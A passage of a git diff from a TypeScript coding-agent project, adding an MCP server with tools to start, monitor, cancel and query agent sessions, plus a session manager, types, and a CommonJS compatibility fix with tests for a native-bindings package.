--------------------------------------------------------------------------- + +async function readProjectState(projectDir: string, _query: string): Promise> { + const gsdDir = join(resolve(projectDir), '.gsd'); + const result: Record = { projectDir: resolve(projectDir) }; + + // STATE.md — current execution state + try { + result.state = await readFile(join(gsdDir, 'STATE.md'), 'utf-8'); + } catch { + result.state = null; + } + + // PROJECT.md — project description + try { + result.project = await readFile(join(gsdDir, 'PROJECT.md'), 'utf-8'); + } catch { + result.project = null; + } + + // REQUIREMENTS.md — requirement contract + try { + result.requirements = await readFile(join(gsdDir, 'REQUIREMENTS.md'), 'utf-8'); + } catch { + result.requirements = null; + } + + // List milestones with basic metadata + const milestonesDir = join(gsdDir, 'milestones'); + try { + const entries = await readdir(milestonesDir, { withFileTypes: true }); + const milestones: Array<{ id: string; hasRoadmap: boolean; hasSummary: boolean }> = []; + for (const entry of entries) { + if (!entry.isDirectory()) continue; + const mDir = join(milestonesDir, entry.name); + const hasRoadmap = await fileExists(join(mDir, `${entry.name}-ROADMAP.md`)); + const hasSummary = await fileExists(join(mDir, `${entry.name}-SUMMARY.md`)); + milestones.push({ id: entry.name, hasRoadmap, hasSummary }); + } + result.milestones = milestones; + } catch { + result.milestones = []; + } + + return result; +} + +async function fileExists(path: string): Promise { + try { + await stat(path); + return true; + } catch { + return false; + } +} + +// --------------------------------------------------------------------------- +// MCP Server type — minimal interface for the dynamically-imported McpServer +// --------------------------------------------------------------------------- + +interface McpServerInstance { + tool(name: string, description: string, params: Record, handler: (args: Record) => Promise): unknown; + connect(transport: unknown): Promise; + close(): Promise; +} + +// --------------------------------------------------------------------------- +// createMcpServer +// --------------------------------------------------------------------------- + +/** + * Create and configure an MCP server with 12 GSD tools (6 session + 6 read-only). + * + * Returns the McpServer instance — call `connect(transport)` to start serving. + * Uses dynamic imports for the MCP SDK to avoid TS subpath resolution issues. + */ +export async function createMcpServer(sessionManager: SessionManager): Promise<{ + server: McpServerInstance; +}> { + // Dynamic import — same workaround as src/mcp-server.ts + const mcpMod = await import(`${MCP_PKG}/server/mcp.js`); + const McpServer = mcpMod.McpServer; + + const server: McpServerInstance = new McpServer( + { name: SERVER_NAME, version: SERVER_VERSION }, + { capabilities: { tools: {} } }, + ); + + // ----------------------------------------------------------------------- + // gsd_execute — start a new GSD auto-mode session + // ----------------------------------------------------------------------- + server.tool( + 'gsd_execute', + 'Start a GSD auto-mode session for a project directory. Returns a sessionId for tracking.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + command: z.string().optional().describe('Command to send (default: "/gsd auto")'), + model: z.string().optional().describe('Model ID override'), + bare: z.boolean().optional().describe('Run in bare mode (skip user config)'), + }, + async (args: Record) => { + const { projectDir, command, model, bare } = args as { + projectDir: string; command?: string; model?: string; bare?: boolean; + }; + try { + const sessionId = await sessionManager.startSession(projectDir, { command, model, bare }); + return jsonContent({ sessionId, status: 'started' }); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_status — poll session status + // ----------------------------------------------------------------------- + server.tool( + 'gsd_status', + 'Get the current status of a GSD session including progress, recent events, and pending blockers.', + { + sessionId: z.string().describe('Session ID returned from gsd_execute'), + }, + async (args: Record) => { + const { sessionId } = args as { sessionId: string }; + try { + const session = sessionManager.getSession(sessionId); + if (!session) return errorContent(`Session not found: ${sessionId}`); + + const durationMs = Date.now() - session.startTime; + const toolCallCount = session.events.filter( + (e) => (e as Record).type === 'tool_use' || + (e as Record).type === 'tool_execution_start' + ).length; + + return jsonContent({ + status: session.status, + progress: { + eventCount: session.events.length, + toolCalls: toolCallCount, + }, + recentEvents: session.events.slice(-10), + pendingBlocker: session.pendingBlocker + ? { + id: session.pendingBlocker.id, + method: session.pendingBlocker.method, + message: session.pendingBlocker.message, + } + : null, + cost: session.cost, + durationMs, + }); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_result — get accumulated session result + // ----------------------------------------------------------------------- + server.tool( + 'gsd_result', + 'Get the result of a GSD session. Returns partial results if the session is still running.', + { + sessionId: z.string().describe('Session ID returned from gsd_execute'), + }, + async (args: Record) => { + const { sessionId } = args as { sessionId: string }; + try { + const result = sessionManager.getResult(sessionId); + return jsonContent(result); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_cancel — cancel a running session + // ----------------------------------------------------------------------- + server.tool( + 'gsd_cancel', + 'Cancel a running GSD session. Aborts the current operation and stops the process.', + { + sessionId: z.string().describe('Session ID returned from gsd_execute'), + }, + async (args: Record) => { + const { sessionId } = args as { sessionId: string }; + try { + await sessionManager.cancelSession(sessionId); + return jsonContent({ cancelled: true }); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_query — read project state from filesystem (no session needed) + // ----------------------------------------------------------------------- + server.tool( + 'gsd_query', + 'Query GSD project state from the filesystem. Returns STATE.md, PROJECT.md, requirements, and milestone listing. Does not require an active session.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + query: z.string().describe('What to query (e.g. "status", "milestones", "requirements")'), + }, + async (args: Record) => { + const { projectDir, query } = args as { projectDir: string; query: string }; + try { + const state = await readProjectState(projectDir, query); + return jsonContent(state); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_resolve_blocker — resolve a pending blocker + // ----------------------------------------------------------------------- + server.tool( + 'gsd_resolve_blocker', + 'Resolve a pending blocker in a GSD session by sending a response to the UI request.', + { + sessionId: z.string().describe('Session ID returned from gsd_execute'), + response: z.string().describe('Response to send for the pending blocker'), + }, + async (args: Record) => { + const { sessionId, response } = args as { sessionId: string; response: string }; + try { + await sessionManager.resolveBlocker(sessionId, response); + return jsonContent({ resolved: true }); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ======================================================================= + // READ-ONLY TOOLS — no session required, pure filesystem reads + // ======================================================================= + + // ----------------------------------------------------------------------- + // gsd_progress — structured project progress metrics + // ----------------------------------------------------------------------- + server.tool( + 'gsd_progress', + 'Get structured project progress: active milestone/slice/task, phase, completion counts, blockers, and next action. No session required — reads directly from .gsd/ on disk.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + }, + async (args: Record) => { + const { projectDir } = args as { projectDir: string }; + try { + return jsonContent(readProgress(projectDir)); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_roadmap — milestone/slice/task structure with status + // ----------------------------------------------------------------------- + server.tool( + 'gsd_roadmap', + 'Get the full project roadmap structure: milestones with their slices, tasks, status, risk, and dependencies. Optionally filter to a single milestone. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + milestoneId: z.string().optional().describe('Filter to a specific milestone (e.g. "M001")'), + }, + async (args: Record) => { + const { projectDir, milestoneId } = args as { projectDir: string; milestoneId?: string }; + try { + return jsonContent(readRoadmap(projectDir, milestoneId)); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_history — execution history with cost/token metrics + // ----------------------------------------------------------------------- + server.tool( + 'gsd_history', + 'Get execution history with cost, token usage, model, and duration per unit. Returns totals across all units. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + limit: z.number().optional().describe('Max entries to return (most recent first). Default: all.'), + }, + async (args: Record) => { + const { projectDir, limit } = args as { projectDir: string; limit?: number }; + try { + return jsonContent(readHistory(projectDir, limit)); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_doctor — lightweight structural health check + // ----------------------------------------------------------------------- + server.tool( + 'gsd_doctor', + 'Run a lightweight structural health check on the .gsd/ directory. Checks for missing files, status inconsistencies, and orphaned state. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + scope: z.string().optional().describe('Limit checks to a specific milestone (e.g. "M001")'), + }, + async (args: Record) => { + const { projectDir, scope } = args as { projectDir: string; scope?: string }; + try { + return jsonContent(runDoctorLite(projectDir, scope)); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_captures — pending captures and ideas + // ----------------------------------------------------------------------- + server.tool( + 'gsd_captures', + 'Get captured ideas and thoughts from CAPTURES.md with triage status. Filter by pending, actionable, or all. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + filter: z.enum(['all', 'pending', 'actionable']).optional().describe('Filter captures (default: "all")'), + }, + async (args: Record) => { + const { projectDir, filter } = args as { projectDir: string; filter?: 'all' | 'pending' | 'actionable' }; + try { + return jsonContent(readCaptures(projectDir, filter ?? 'all')); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + // ----------------------------------------------------------------------- + // gsd_knowledge — project knowledge base + // ----------------------------------------------------------------------- + server.tool( + 'gsd_knowledge', + 'Get the project knowledge base: rules, patterns, and lessons learned accumulated during development. No session required.', + { + projectDir: z.string().describe('Absolute path to the project directory'), + }, + async (args: Record) => { + const { projectDir } = args as { projectDir: string }; + try { + return jsonContent(readKnowledge(projectDir)); + } catch (err) { + return errorContent(err instanceof Error ? err.message : String(err)); + } + }, + ); + + return { server }; +} diff --git a/packages/mcp-server/src/session-manager.ts b/packages/mcp-server/src/session-manager.ts new file mode 100644 index 000000000..841941196 --- /dev/null +++ b/packages/mcp-server/src/session-manager.ts @@ -0,0 +1,328 @@ +/** + * SessionManager — manages RpcClient lifecycle for background GSD execution. + * + * One active session per projectDir. Tracks events in a ring buffer, + * detects blockers, tracks terminal state, and accumulates cost using + * the cumulative-max pattern (K004). + */ + +import { execSync } from 'node:child_process'; +import { resolve } from 'node:path'; +import { RpcClient } from '@gsd-build/rpc-client'; +import type { SdkAgentEvent, RpcInitResult, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; +import type { + ManagedSession, + ExecuteOptions, + PendingBlocker, + CostAccumulator, + SessionStatus, +} from './types.js'; +import { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js'; + +// --------------------------------------------------------------------------- +// Inlined detection logic (from headless-events.ts — no internal package imports) +// --------------------------------------------------------------------------- + +const FIRE_AND_FORGET_METHODS = new Set([ + 'notify', 'setStatus', 'setWidget', 'setTitle', 'set_editor_text', +]); + +const TERMINAL_PREFIXES = ['auto-mode stopped', 'step-mode stopped']; + +function isTerminalNotification(event: Record): boolean { + if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false; + const message = String(event.message ?? '').toLowerCase(); + return TERMINAL_PREFIXES.some((prefix) => message.startsWith(prefix)); +} + +function isBlockedNotification(event: Record): boolean { + if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false; + const message = String(event.message ?? '').toLowerCase(); + return message.includes('blocked:'); +} + +function isBlockingUIRequest(event: Record): boolean { + if (event.type !== 'extension_ui_request') return false; + const method = String(event.method ?? ''); + return !FIRE_AND_FORGET_METHODS.has(method); +} + +// --------------------------------------------------------------------------- +// SessionManager +// --------------------------------------------------------------------------- + +export class SessionManager { + /** Sessions keyed by projectDir for duplicate-start prevention */ + private sessions = new Map(); + + /** + * Start a new GSD auto-mode session for the given project directory. + * + * Rejects if a session already exists for this projectDir. + * Creates an RpcClient, starts the process, performs the v2 init handshake, + * wires event tracking, and sends '/gsd auto' to begin execution. + */ + async startSession(projectDir: string, options: ExecuteOptions = {}): Promise { + if (!projectDir || projectDir.trim() === '') { + throw new Error('projectDir is required and cannot be empty'); + } + + const resolvedDir = resolve(projectDir); + + const existing = this.sessions.get(resolvedDir); + if (existing) { + throw new Error( + `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})` + ); + } + + const cliPath = options.cliPath ?? SessionManager.resolveCLIPath(); + + const args: string[] = ['--mode', 'rpc']; + if (options.model) args.push('--model', options.model); + if (options.bare) args.push('--bare'); + + const client = new RpcClient({ + cliPath, + cwd: resolvedDir, + args, + }); + + // Build the session shell before async operations so we can track state + const session: ManagedSession = { + sessionId: '', // filled after init + projectDir: resolvedDir, + status: 'starting', + client, + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + }; + + // Insert into map early (keyed by dir) so concurrent starts are rejected + this.sessions.set(resolvedDir, session); + + try { + // Start the process with timeout + await Promise.race([ + client.start(), + timeout(INIT_TIMEOUT_MS, `RpcClient.start() timed out after ${INIT_TIMEOUT_MS}ms`), + ]); + + // Perform v2 init handshake + const initResult: RpcInitResult = await Promise.race([ + client.init(), + timeout(INIT_TIMEOUT_MS, `RpcClient.init() timed out after ${INIT_TIMEOUT_MS}ms`), + ]) as RpcInitResult; + + session.sessionId = initResult.sessionId; + session.status = 'running'; + + // Wire event tracking + session.unsubscribe = client.onEvent((event: SdkAgentEvent) => { + this.handleEvent(session, event); + }); + + // Kick off auto-mode + const command = options.command ?? '/gsd auto'; + await client.prompt(command); + + return session.sessionId; + } catch (err) { + session.status = 'error'; + session.error = err instanceof Error ? err.message : String(err); + + // Attempt cleanup + try { await client.stop(); } catch { /* swallow cleanup errors */ } + + // Keep session in map so callers can inspect the error + throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`); + } + } + + /** + * Look up a session by sessionId. + * Linear scan is fine — we expect <10 concurrent sessions. + */ + getSession(sessionId: string): ManagedSession | undefined { + for (const session of this.sessions.values()) { + if (session.sessionId === sessionId) return session; + } + return undefined; + } + + /** + * Look up a session by project directory (direct map lookup). + */ + getSessionByDir(projectDir: string): ManagedSession | undefined { + return this.sessions.get(resolve(projectDir)); + } + + /** + * Resolve a pending blocker by sending a UI response. + */ + async resolveBlocker(sessionId: string, response: string): Promise { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + if (!session.pendingBlocker) throw new Error(`No pending blocker for session ${sessionId}`); + + const blocker = session.pendingBlocker; + session.client.sendUIResponse(blocker.id, { value: response }); + session.pendingBlocker = null; + if (session.status === 'blocked') { + session.status = 'running'; + } + } + + /** + * Cancel a running session — abort current operation then stop the process. + */ + async cancelSession(sessionId: string): Promise { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + + try { + await session.client.abort(); + } catch { /* may already be stopped */ } + + try { + await session.client.stop(); + } catch { /* swallow */ } + + session.status = 'cancelled'; + session.unsubscribe?.(); + } + + /** + * Build a HeadlessJsonResult-shaped object from accumulated session state. + */ + getResult(sessionId: string): Record { + const session = this.getSession(sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + + const durationMs = Date.now() - session.startTime; + + return { + sessionId: session.sessionId, + projectDir: session.projectDir, + status: session.status, + durationMs, + cost: session.cost, + recentEvents: session.events.slice(-10), + pendingBlocker: session.pendingBlocker + ? { id: session.pendingBlocker.id, method: session.pendingBlocker.method, message: session.pendingBlocker.message } + : null, + error: session.error ?? null, + }; + } + + /** + * Stop all active sessions and clean up resources. + */ + async cleanup(): Promise { + const stopPromises: Promise[] = []; + + for (const session of this.sessions.values()) { + session.unsubscribe?.(); + if (session.status === 'running' || session.status === 'starting' || session.status === 'blocked') { + stopPromises.push( + session.client.stop().catch(() => { /* swallow */ }) + ); + session.status = 'cancelled'; + } + } + + await Promise.allSettled(stopPromises); + } + + /** + * Resolve the GSD CLI path. + * + * 1. GSD_CLI_PATH env var (highest priority) + * 2. `which gsd` → resolve to the actual dist/cli.js + */ + static resolveCLIPath(): string { + // Check env var first + const envPath = process.env['GSD_CLI_PATH']; + if (envPath) return resolve(envPath); + + // Fallback: locate `gsd` via which + try { + const gsdBin = execSync('which gsd', { encoding: 'utf-8' }).trim(); + if (gsdBin) { + // gsd bin is typically a symlink to dist/loader.js — return the resolved path + return resolve(gsdBin); + } + } catch { + // which failed + } + + throw new Error( + 'Cannot find GSD CLI. Set GSD_CLI_PATH environment variable or ensure `gsd` is in PATH.' + ); + } + + // --------------------------------------------------------------------------- + // Private: Event Handling + // --------------------------------------------------------------------------- + + private handleEvent(session: ManagedSession, event: SdkAgentEvent): void { + // Ring buffer: push and trim + session.events.push(event); + if (session.events.length > MAX_EVENTS) { + session.events.splice(0, session.events.length - MAX_EVENTS); + } + + // Cost tracking (K004 — cumulative-max) + if (event.type === 'cost_update') { + const costEvent = event as unknown as RpcCostUpdateEvent; + session.cost.totalCost = Math.max(session.cost.totalCost, costEvent.cumulativeCost ?? 0); + if (costEvent.tokens) { + session.cost.tokens.input = Math.max(session.cost.tokens.input, costEvent.tokens.input ?? 0); + session.cost.tokens.output = Math.max(session.cost.tokens.output, costEvent.tokens.output ?? 0); + session.cost.tokens.cacheRead = Math.max(session.cost.tokens.cacheRead, costEvent.tokens.cacheRead ?? 0); + session.cost.tokens.cacheWrite = Math.max(session.cost.tokens.cacheWrite, costEvent.tokens.cacheWrite ?? 0); + } + } + + // Terminal detection — auto-mode/step-mode stopped + if (isTerminalNotification(event as Record)) { + // Check if it's a blocked stop (not truly terminal — it's a blocker) + if (isBlockedNotification(event as Record)) { + session.status = 'blocked'; + session.pendingBlocker = extractBlocker(event); + } else { + session.status = 'completed'; + session.unsubscribe?.(); + } + return; + } + + // Blocker detection — non-fire-and-forget extension_ui_request + if (isBlockingUIRequest(event as Record)) { + session.status = 'blocked'; + session.pendingBlocker = extractBlocker(event); + } + } +} + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +function timeout(ms: number, message: string): Promise { + return new Promise((_, reject) => { + setTimeout(() => reject(new Error(message)), ms); + }); +} + +function extractBlocker(event: SdkAgentEvent): PendingBlocker { + const uiEvent = event as unknown as RpcExtensionUIRequest; + return { + id: String(uiEvent.id ?? ''), + method: String(uiEvent.method ?? ''), + message: String((uiEvent as Record).title ?? (uiEvent as Record).message ?? ''), + event: uiEvent, + }; +} diff --git a/packages/mcp-server/src/types.ts b/packages/mcp-server/src/types.ts new file mode 100644 index 000000000..fa12c9f61 --- /dev/null +++ b/packages/mcp-server/src/types.ts @@ -0,0 +1,107 @@ +/** + * MCP Server types — session lifecycle and orchestration. + */ + +import type { RpcClient, SdkAgentEvent, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; + +// --------------------------------------------------------------------------- +// Session Status +// --------------------------------------------------------------------------- + +export type SessionStatus = 'starting' | 'running' | 'blocked' | 'completed' | 'error' | 'cancelled'; + +// --------------------------------------------------------------------------- +// Managed Session +// --------------------------------------------------------------------------- + +export interface ManagedSession { + /** Unique session ID returned from RpcClient.init() */ + sessionId: string; + + /** Absolute path to the project directory */ + projectDir: string; + + /** Current lifecycle status */ + status: SessionStatus; + + /** The RpcClient instance managing the agent process */ + client: RpcClient; + + /** Ring buffer of recent events (capped at MAX_EVENTS) */ + events: SdkAgentEvent[]; + + /** Pending blocker requiring user response, if any */ + pendingBlocker: PendingBlocker | null; + + /** Cumulative cost tracking (max pattern per K004) */ + cost: CostAccumulator; + + /** Session start timestamp */ + startTime: number; + + /** Error message if status is 'error' */ + error?: string; + + /** Cleanup function to unsubscribe from events */ + unsubscribe?: () => void; +} + +// --------------------------------------------------------------------------- +// Pending Blocker +// --------------------------------------------------------------------------- + +export interface PendingBlocker { + /** The extension_ui_request id */ + id: string; + + /** The request method (e.g. 'select', 'confirm', 'input') */ + method: string; + + /** Human-readable message or title */ + message: string; + + /** Full event payload for inspection */ + event: RpcExtensionUIRequest; +} + +// --------------------------------------------------------------------------- +// Cost Accumulator (K004 — cumulative-max) +// --------------------------------------------------------------------------- + +export interface CostAccumulator { + totalCost: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + }; +} + +// --------------------------------------------------------------------------- +// Execute Options +// --------------------------------------------------------------------------- + +export interface ExecuteOptions { + /** Command to send after '/gsd auto' (default: none) */ + command?: string; + + /** Model ID override */ + model?: string; + + /** Run in bare mode (skip user config) */ + bare?: boolean; + + /** Path to CLI binary (overrides GSD_CLI_PATH and which resolution) */ + cliPath?: string; +} + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +/** Maximum number of events kept in the ring buffer */ +export const MAX_EVENTS = 50; + +/** Timeout for RpcClient initialization (ms) */ +export const INIT_TIMEOUT_MS = 30_000; diff --git a/packages/mcp-server/tsconfig.json b/packages/mcp-server/tsconfig.json new file mode 100644 index 000000000..779b48aca --- /dev/null +++ b/packages/mcp-server/tsconfig.json @@ -0,0 +1,24 @@ +{ + "compilerOptions": { + "target": "ES2024", + "module": "Node16", + "lib": ["ES2024"], + "strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "forceConsistentCasingInFileNames": true, + "declaration": true, + "declarationMap": true, + "sourceMap": true, + "inlineSources": true, + "inlineSourceMap": false, + "moduleResolution": "Node16", + "resolveJsonModule": true, + "allowImportingTsExtensions": false, + "types": ["node"], + "outDir": "./dist", + "rootDir": "./src" + }, + "include": ["src/**/*.ts"], + "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"] +} diff --git a/packages/native/package.json b/packages/native/package.json index 1bb3b009d..42bc47668 100644 --- a/packages/native/package.json +++ b/packages/native/package.json @@ -2,7 +2,7 @@ "name": "@gsd/native", "version": "0.1.0", "description": "Native Rust bindings for GSD \u2014 high-performance native modules via N-API", - "type": "module", + "type": "commonjs", "main": "./dist/index.js", "types": "./dist/index.d.ts", "scripts": { @@ -14,75 +14,75 @@ "exports": { ".": { "types": "./dist/index.d.ts", - "import": "./dist/index.js" + "default": "./dist/index.js" }, "./grep": { "types": "./dist/grep/index.d.ts", - "import": "./dist/grep/index.js" + "default": "./dist/grep/index.js" }, "./ps": { "types": "./dist/ps/index.d.ts", - "import": "./dist/ps/index.js" + "default": "./dist/ps/index.js" }, "./glob": { "types": "./dist/glob/index.d.ts", - "import": "./dist/glob/index.js" + "default": "./dist/glob/index.js" }, "./clipboard": { "types": "./dist/clipboard/index.d.ts", - "import": "./dist/clipboard/index.js" + "default": "./dist/clipboard/index.js" }, "./ast": { "types": "./dist/ast/index.d.ts", - "import": "./dist/ast/index.js" + "default": "./dist/ast/index.js" }, "./html": { "types": "./dist/html/index.d.ts", - "import": "./dist/html/index.js" + "default": "./dist/html/index.js" }, "./text": { "types": "./dist/text/index.d.ts", - "import": "./dist/text/index.js" + "default": "./dist/text/index.js" }, "./fd": { "types": "./dist/fd/index.d.ts", - "import": "./dist/fd/index.js" + "default": "./dist/fd/index.js" }, "./image": { "types": "./dist/image/index.d.ts", - "import": "./dist/image/index.js" + "default": "./dist/image/index.js" }, "./xxhash": { "types": "./dist/xxhash/index.d.ts", - "import": "./dist/xxhash/index.js" + "default": "./dist/xxhash/index.js" }, "./diff": { "types": "./dist/diff/index.d.ts", - "import": "./dist/diff/index.js" + "default": "./dist/diff/index.js" }, "./gsd-parser": { "types": "./dist/gsd-parser/index.d.ts", - "import": "./dist/gsd-parser/index.js" + "default": "./dist/gsd-parser/index.js" }, "./highlight": { "types": "./dist/highlight/index.d.ts", - "import": "./dist/highlight/index.js" + "default": "./dist/highlight/index.js" }, "./json-parse": { "types": "./dist/json-parse/index.d.ts", - "import": "./dist/json-parse/index.js" + "default": "./dist/json-parse/index.js" }, "./stream-process": { "types": "./dist/stream-process/index.d.ts", - "import": "./dist/stream-process/index.js" + "default": "./dist/stream-process/index.js" }, "./truncate": { "types": "./dist/truncate/index.d.ts", - "import": "./dist/truncate/index.js" + "default": "./dist/truncate/index.js" }, "./ttsr": { "types": "./dist/ttsr/index.d.ts", - "import": "./dist/ttsr/index.js" + "default": "./dist/ttsr/index.js" } }, "files": [ diff --git a/packages/native/src/__tests__/module-compat.test.mjs b/packages/native/src/__tests__/module-compat.test.mjs new file mode 100644 index 000000000..949fd16d3 --- /dev/null +++ b/packages/native/src/__tests__/module-compat.test.mjs @@ -0,0 +1,91 @@ +/** + * Tests that the @gsd/native package.json is correctly configured + * for Node.js module resolution (ESM/CJS compatibility). + * + * Regression test for #2861: "type": "module" + "import"-only export + * conditions caused crashes on Node.js v24 when the parent package also + * declared "type": "module" and strict ESM resolution was enforced. + */ + +import { test, describe } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import * as path from "node:path"; +import { fileURLToPath } from "node:url"; + +const __dirname = path.dirname(fileURLToPath(import.meta.url)); +const pkgPath = path.resolve(__dirname, "..", "..", "package.json"); +const pkg = JSON.parse(readFileSync(pkgPath, "utf8")); + +describe("@gsd/native module compatibility (#2861)", () => { + test("package.json must not declare type: module (compiled output is CJS-compatible)", () => { + // The compiled output uses createRequire() to load .node addons. + // Declaring "type": "module" forces Node.js to treat .js files as ESM, + // but the package needs "type": "commonjs" to override the parent + // package's "type": "module" and ensure correct CJS semantics. + assert.notEqual( + pkg.type, + "module", + 'package.json must not set "type": "module" — this causes crashes on Node.js v24 ' + + "when the parent package also declares ESM (see #2861)", + ); + }); + + test("package.json should explicitly declare type: commonjs", () => { + // When installed as a dependency under a parent with "type": "module" + // (e.g. gsd-pi), an absent "type" field would inherit the parent's + // ESM setting. Explicit "commonjs" overrides this. + assert.equal( + pkg.type, + "commonjs", + 'package.json must explicitly set "type": "commonjs" to override ' + + "the parent package's ESM declaration", + ); + }); + + test("all export conditions must use 'default' (not 'import'-only)", () => { + // The "import" condition key restricts resolution to ESM import + // statements only. Using "default" ensures the export works for both + // require() and import, which is essential for a CJS package that may + // be consumed from ESM code via Node's CJS interop. + const exportsMap = pkg.exports; + assert.ok(exportsMap, "package.json must have an exports map"); + + for (const [subpath, conditions] of Object.entries(exportsMap)) { + assert.ok( + !conditions.import || conditions.default, + `exports["${subpath}"] uses "import" condition without "default" — ` + + `this breaks CJS consumers and Node.js v24 strict resolution`, + ); + } + }); + + test("native.ts source must not use bare import.meta.url (parse-time error in CJS)", () => { + // When compiled to CJS, import.meta is a *parse-time* syntax error -- + // typeof guards don't help because Node rejects the syntax before + // executing any code. The source must wrap import.meta access in + // an indirect eval so the CJS parser never sees the bare syntax. + const nativeSrc = readFileSync( + path.resolve(__dirname, "..", "native.ts"), + "utf8", + ); + + // Bare import.meta.url (NOT wrapped) would crash at parse time in CJS. + // These regexes match direct usage like fileURLToPath(import.meta.url) + // and createRequire(import.meta.url), but NOT indirect patterns that + // hide import.meta from the CJS parser. + const hasBareImportMetaDirname = /path\.dirname\(.*fileURLToPath\(import\.meta\.url\)\)/.test(nativeSrc); + const hasBareImportMetaRequire = /createRequire\(import\.meta\.url\)/.test(nativeSrc); + + assert.ok( + !hasBareImportMetaDirname, + "native.ts must not use bare import.meta.url in fileURLToPath() -- " + + "this is a parse-time syntax error in CJS; use indirect eval", + ); + assert.ok( + !hasBareImportMetaRequire, + "native.ts must not use bare import.meta.url in createRequire() -- " + + "this is a parse-time syntax error in CJS; use indirect eval", + ); + }); +}); diff --git a/packages/native/src/__tests__/stream-process.test.mjs b/packages/native/src/__tests__/stream-process.test.mjs new file mode 100644 index 000000000..224f0bffa --- /dev/null +++ b/packages/native/src/__tests__/stream-process.test.mjs @@ -0,0 +1,34 @@ +import { test, describe } from "node:test"; +import assert from "node:assert/strict"; +import { processStreamChunk } from "../stream-process/index.ts"; + +describe("processStreamChunk", () => { + test("processes a single chunk without state", () => { + const result = processStreamChunk(Buffer.from("hello world\n")); + assert.equal(result.text, "hello world\n"); + assert.ok(Array.isArray(result.state.utf8Pending)); + assert.ok(Array.isArray(result.state.ansiPending)); + }); + + test("processes multiple chunks passing state between calls", () => { + const result1 = processStreamChunk(Buffer.from("first\n")); + assert.equal(result1.text, "first\n"); + + // This was the crash: passing state back caused + // "Given napi value is not an array on StreamState.utf8Pending" + // when state arrays were wrapped in Buffer.from() instead of Array.from() + const result2 = processStreamChunk(Buffer.from("second\n"), result1.state); + assert.equal(result2.text, "second\n"); + + const result3 = processStreamChunk(Buffer.from("third\n"), result2.state); + assert.equal(result3.text, "third\n"); + }); + + test("state fields are plain arrays, not Buffers", () => { + const result = processStreamChunk(Buffer.from("test\n")); + assert.ok(Array.isArray(result.state.utf8Pending), "utf8Pending should be a plain array"); + assert.ok(Array.isArray(result.state.ansiPending), "ansiPending should be a plain array"); + assert.ok(!(result.state.utf8Pending instanceof Buffer), "utf8Pending should not be a Buffer"); + assert.ok(!(result.state.ansiPending instanceof Buffer), "ansiPending should not be a Buffer"); + }); +}); diff --git a/packages/native/src/native.ts b/packages/native/src/native.ts index b310cef28..05d4288b1 100644 --- a/packages/native/src/native.ts +++ b/packages/native/src/native.ts @@ -8,14 +8,15 @@ * 3. native/addon/gsd_engine.dev.node (local debug build) */ -import { createRequire } from "node:module"; import * as path from "node:path"; -import { fileURLToPath } from "node:url"; -const __dirname = path.dirname(fileURLToPath(import.meta.url)); -const require = createRequire(import.meta.url); +// __dirname and require are available in both execution contexts: +// - CJS (production build via tsc): provided natively by Node +// - ESM (CI test loader): injected by the dist-redirect.mjs preamble +const _dirname = __dirname; +const _require = require; -const addonDir = path.resolve(__dirname, "..", "..", "..", "native", "addon"); +const addonDir = path.resolve(_dirname, "..", "..", "..", "native", "addon"); const platformTag = `${process.platform}-${process.arch}`; /** Map Node.js platform/arch to the npm package suffix */ @@ -36,7 +37,7 @@ function loadNative(): Record { const packageSuffix = platformPackageMap[platformTag]; if (packageSuffix) { try { - _loadedSuccessfully = true; return require(`@gsd-build/engine-${packageSuffix}`) as Record; + _loadedSuccessfully = true; return _require(`@gsd-build/engine-${packageSuffix}`) as Record; } catch (err) { const message = err instanceof Error ? err.message : String(err); errors.push(`@gsd-build/engine-${packageSuffix}: ${message}`); @@ -46,7 +47,7 @@ function loadNative(): Record { // 2. Try local release build 